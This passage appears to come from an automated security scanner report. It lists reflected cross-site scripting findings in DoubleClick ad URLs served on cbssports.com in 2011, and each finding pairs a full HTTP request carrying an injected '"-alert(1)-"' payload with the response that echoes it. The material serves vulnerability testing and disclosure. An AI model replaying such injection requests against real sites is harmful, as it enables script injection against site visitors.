b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2434f12e"-alert(1)-"b0679799619&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

3.48. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d526e"-alert(1)-"a35697c3090 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385d526e"-alert(1)-"a35697c3090&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:24:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385d526e"-alert(1)-"a35697c3090&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=
...[SNIP]...

3.49. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4924b"-alert(1)-"e04afa304fa was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=5115224924b"-alert(1)-"e04afa304fa&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/175/%2a/f%3B240390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=5115224924b"-alert(1)-"e04afa304fa&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbsspor
...[SNIP]...

3.50. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c93a5"-alert(1)-"a1432e838ab was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175c93a5"-alert(1)-"a1432e838ab&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175c93a5"-alert(1)-"a1432e838ab&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT
...[SNIP]...

3.51. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dbe2"-alert(1)-"5a7ce4f1f97 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=156483dbe2"-alert(1)-"5a7ce4f1f97&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/175/%2a/f%3B240390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=156483dbe2"-alert(1)-"5a7ce4f1f97&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=w
...[SNIP]...

3.52. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81f2c"-alert(1)-"a9944300532 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.5181f2c"-alert(1)-"a9944300532&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:26:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
id=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.5181f2c"-alert(1)-"a9944300532&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var open
...[SNIP]...

3.53. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb6a1"-alert(1)-"2fce02e725 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59cb6a1"-alert(1)-"2fce02e725&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:02:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6950



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59cb6a1"-alert(1)-"2fce02e725&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tb
...[SNIP]...

3.54. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a85c1"-alert(1)-"a850f38534d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=a85c1"-alert(1)-"a850f38534d&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:05:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=a85c1"-alert(1)-"a850f38534d&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&even
...[SNIP]...

3.55. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c402c"-alert(1)-"b9372fb4719 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c402c"-alert(1)-"b9372fb4719&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c402c"-alert(1)-"b9372fb4719&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

3.56. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4967e"-alert(1)-"61439fec9d1 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=4967e"-alert(1)-"61439fec9d1&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=4967e"-alert(1)-"61439fec9d1&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

3.57. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2b25"-alert(1)-"c1a8f9ea9c2 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=a2b25"-alert(1)-"c1a8f9ea9c2&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:06:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
97/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=a2b25"-alert(1)-"c1a8f9ea9c2&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http:
...[SNIP]...

3.58. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86d72"-alert(1)-"3044e5f3dbb was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=86d72"-alert(1)-"3044e5f3dbb&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
